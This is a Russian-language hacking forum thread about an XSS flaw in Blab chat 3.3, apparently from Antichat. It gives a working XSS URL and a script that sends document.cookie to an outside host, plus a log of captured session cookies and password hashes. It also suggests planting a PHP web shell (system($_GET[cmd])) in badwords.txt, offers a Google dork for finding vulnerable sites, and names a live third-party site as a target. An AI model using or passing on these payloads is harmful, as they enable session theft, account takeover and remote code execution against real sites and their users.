Форум АНТИЧАТ - Blab chat Active XSS

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)

- - Blab chat Active XSS (https://forum.antichat.xyz/showthread.php?t=26264)

Blab chat Active XSS

решил поковыряца, под руками была только версия 3,3, думаю слипу интересно будет
http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>

s.js

PHP код:


		
			
img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

PHP код:


		
			
REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E

    QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4; blab_pass=813dfe9bd7b89fbcc5fd29d2be091bac; blab_lang=9; blab_time=3

    AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; x64; SV1)

+ с правами админа можно сдампить БД юзеров,
при наличии локального инклуда на сайте
в badwords.txt можно безпалевно вписать

PHP код:


		
			
<?php system($_GET[cmd]); ?>

- админ этого неувидит, а так же с обычными правами можно загрузить картинку с шелл кодом.
гугл inurl:"info.php?reason=link"

Отлично поработал:) Если есть чат на примете, в онлайне, кинь ссылку. А то через денвер в лом искать. Буду пробовать ещё что то сделать:)

Определение версии чата

в самом низу
гугл inurl:"info.php?reason=link"

Определение версии чата - _http://www.host.ru/chat/version

Вот вам и такое=)
http://www.sisak.info/index.php?p=

фильтруются символы ".." и "/"
путь /home/sisak/public_html/

пригодилось